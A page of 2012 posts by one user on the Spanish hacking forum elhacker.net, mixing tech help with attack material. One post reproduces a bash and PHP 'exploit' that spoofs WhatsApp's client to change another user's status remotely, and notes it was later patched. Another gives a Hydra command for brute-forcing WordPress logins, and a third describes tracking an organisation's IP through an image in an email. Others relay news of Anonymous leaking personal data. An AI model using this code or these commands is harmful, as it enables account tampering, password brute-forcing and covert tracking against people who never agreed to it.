elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: El geolocalizador de IP's ya funciona con IPv6


  Mostrar Mensajes
Páginas: 1 ... 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 [402] 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 ... 636
4011  Seguridad Informática / Bugs y Exploits / WhatsApp Status Changer v0.2 Exploit en: 20 Enero 2012, 23:10 pm
Código
  1. #!/bin/bash
  2. #
  3. # WhatsApp Status changer v0.2 stable
  4. # A slim exploit able to change the WhatsApp
  5. # user status in a remote way.
  6. #
  7. # This program is released under the terms of the GNU General Public License
  8. # (GPL), which is distributed with this software in the file "COPYING".
  9. # The GPL specifies the terms under which users may copy and use this software.
  10. #
  11.  
  12. show_help(){
  13.  echo ""
  14.  echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  15.  echo ""
  16.  echo " --usage    show the exploit Usage"
  17.  echo " --credits  show the exploit Credits"
  18.  echo " --help     show the Help"
  19.  echo ""
  20.  echo " enJoy"
  21. }
  22.  
  23. show_credits(){
  24.  echo ""
  25.  echo " Emanuele Gentili"
  26.  echo " http://www.emanuelegentili.eu"
  27.  echo " eg @ offensive-security.it"
  28.  echo ""
  29.  echo " Stefano Fratepietro"
  30.  echo " http://steve.deftlinux.net"
  31.  echo " stefano @ deftlinux.net"
  32.  echo ""
  33.  
  34. }
  35.  
  36. show_usage(){
  37.  echo ""
  38.  echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  39.  echo ""
  40.  echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned"
  41.  echo ""
  42.  echo " enJoy"
  43. }
  44.  
  45.  
  46. # Bash
  47. while [[ $# != 0 ]]; do
  48.    arg_name=$1; shift
  49.    case "$arg_name" in
  50.      --help|-?|-h) show_help; exit 0;;
  51.      --credits) show_credits; exit 0;;
  52.      --usage) show_usage; exit 0;;
  53.      --countrycode) countrycode=$1; shift;;
  54.      --mobilenum) mobilenum=$2; shift;;
  55.      --text) text=$3; shift;;
  56.      *) echo "invalid option: $1"; show_help;exit 1;;
  57.    esac
  58. done
  59.  
  60. [ -z "$countrycode" ] && { show_help; exit 1; }
  61.  
  62. whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)"
  63.  
  64. wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php
  65.  
  66. echo ""
  67. echo "[+] Operazione completata."
  68. echo ""


http://www.exploit-db.com/exploits/18396/

PHP

Código
  1. <form method="post">
  2.  
  3.    <dl>
  4.        <dt>Country code: (example: 31)</dt>
  5.        <dd><input type="text" name="cc" value="31" /></dd>
  6.        <dt>Phonenumber: (example: +31612345678)</dt>
  7.        <dd><input type="text" name="n" value="+316" /></dd>
  8.        <dt>New status:</dt>
  9.        <dd><input type="text" name="m" /></dd>
  10.        <dd><input type="submit" value="Change!" /></dd>
  11.    </dl>
  12.  
  13. </form>
  14.  
  15. <?php
  16. ini_set('display_errors',0);
  17. error_reporting(E_ALL|E_STRICT);
  18.  
  19. if ( $_SERVER['REQUEST_METHOD'] === 'POST' )
  20. {
  21.    $url = 'https://s.whatsapp.net/client/iphone/u.php';
  22.    $fields = array(
  23.        'cc' => urlencode($_POST['cc']),
  24.        'me' => urlencode($_POST['n']),
  25.        's'  => urlencode(stripslashes(utf8_decode($_POST['m'])))
  26.    );
  27.  
  28.    //url-ify the data for the POST
  29.    foreach ($fields as $key=>$value) {
  30.        $fields_string .= $key . '=' . $value . '&';
  31.    }
  32.    rtrim($fields_string, '&');
  33.  
  34.    //open connection
  35.    $ch = curl_init();
  36.  
  37.    //set the url, number of POST vars, POST data
  38.    curl_setopt($ch, CURLOPT_URL, $url);
  39.    curl_setopt($ch, CURLOPT_POST, count($fields));
  40.    curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
  41.    curl_setopt($ch, CURLOPT_USERAGENT, "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)");
  42.  
  43.    //execute post
  44.    $result = curl_exec($ch);
  45.  
  46.    //close connection
  47.    curl_close($ch);
  48.  
  49. }
  50. ?>

Ya no funciona:

WhatsApp implemented an IP check – so this doesn’t work as well as it used to. The check entails checking if the update-request is for a WhatsApp account currently signed in, and checks if it is coming from the same IP as the target client is using. This means above could should still work for target WhatsApp users behind the same NAT (for example).

http://whatsappfail.net/index.php?option=com_content&view=article&id=2&catid=9&Itemid=121

http://www.wiretrip.org/2012/01/12/how-whatsappstatus-net-works/
4012  Foros Generales / Noticias / Anonymous filtra los supuestos datos personales del director del FBI en: 20 Enero 2012, 22:43 pm
El contraataque de Anonymous y diversos hackers al cierre de Megaupload ayer por parte del FBI continúa este viernes.

Si ayer a última hora Anonymous tumbaba varias páginas web relacionadas con la ley SOPA y con el cierre del famoso servidor, este viernes han filtrado a través de Twitter y de diversas páginas web todos los supuestos datos personales del director del FBI, Robert S. Mueller, y su familia: su mujer, sus hijas, su yerno y otros miembros.

Los datos que han hecho públicos en la Red alcanzan casi todas las esferas personales de Mueller y su familia: decenas de direcciones de varias ciudades de Estados Unidos, códigos postales, teléfonos y correos electrónicos.



http://www.publico.es/culturas/417937/anonymous-filtra-los-supuestos-datos-personales-del-director-del-fbi-tras-el-cierre-de-megaupload
4013  Foros Generales / Foro Libre / Re: FILESERVE cierra los pagos en: 20 Enero 2012, 19:59 pm
Uy, uy...  :-\

Rapidshare podría ser el siguiente portal cerrado
http://foro.elhacker.net/noticias/rapidshare_podria_ser_el_siguiente_portal_cerrado-t351099.0.html
4014  Foros Generales / Noticias / Re: Anonymous lanza ataques también en España: cae la web de la SGAE en: 20 Enero 2012, 19:56 pm
claro mira la sgae ahora usa protecciones xD

http://www.sgae.com.s3-website-eu-west-1.amazonaws.com/
4015  Seguridad Informática / Hacking / Re: averiguar ip de una organizacion en: 20 Enero 2012, 19:31 pm
envías un e-mail a la empresa con una imagen que apunte a tu servidor, luego miras el log de acceso quién ha hecho get a esa imagen, y ya tienes la ip de esa empresa.

Claro la imagen que esté a parte para que no sea muy visitada, así sabrá seguro que esa es la ip. Es ingeniería social, o que visiten una web con un link, pero eso ya es más complicado  que hagan click.
4016  Foros Generales / Dudas Generales / Re: Cómo configurar mis camaras de seguridad con un hostname personal? en: 20 Enero 2012, 19:18 pm
Si usas dyndns.org es porque tienes una ip dinámica. Necesitas mejor una ip fija o estarás siempre con el mismo problema, cada vez que cambie de ip tienes que decirle la nueva ip.

Si tienes un dominio propio  puedes añadir una entrada CNAME a las DNS del subdomino micamarasweb.com para que apunte a miscamaras.dydns.org
4017  Foros Generales / Dudas Generales / Re: como crear un usb multiboot? en: 20 Enero 2012, 19:14 pm
Parece que la opción más fácil es usar el programa:

YUMI (Your Universal Multiboot Installer) El sucesor del MultibootIsos





Más info
http://www.pendrivelinux.com/yumi-multiboot-usb-creator/

Crear discos de arranque personalizados para tus proyectos
http://foro.elhacker.net/software/crear_discos_de_arranque_personalizados_para_tus_proyectos-t326662.0.html

Crear CD/DVD booteable...
http://foro.elhacker.net/software/crear_cddvd_booteable-t168517.0.html
4018  Seguridad Informática / Seguridad / Re: Usar hydra para sacar contraseña de wordpress en: 20 Enero 2012, 18:56 pm
creo que  es http-post-form

Código:
# hydra -l admin -P passwod www.wordpressblogsite.org http-post-form “/wordpress/wp-login.php:user_login=^USER^&user_pass=^PASS^:Incorrect” -t 4 

Le tienes que indicar el nombre de los campos del formuario (user y pass)

http://www.sillychicken.co.nz/2011/05/how-to-brute-force-http-forms-in-windows/
4019  Seguridad Informática / Hacking / Re: Problema con navegación en ubuntu en: 20 Enero 2012, 18:18 pm
Es lo normal en muchos trabajos, un filtro, proxy que restringe las webs a visitar y además monitoriza todo el tráfico.

Navegar de forma segura y anónima mediante túneles SSH
http://foro.elhacker.net/seguridad/navegar_de_forma_segura_mediante_tuneles_ssh-t339204.0.html
4020  Seguridad Informática / WarZone / Re: no puedo entrar en warzone. en: 19 Enero 2012, 18:26 pm
|Demon|, warzone estuvo off-line un par de días, por culpa del disco duro, pero luego volvió a estar on-line, pero había otro problema con el directorio de las sesiones del php y aunque estaba activo no dejaba entrar, con lo que era como si estuviera off-line xDD
Páginas: 1 ... 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 [402] 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 ... 636
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines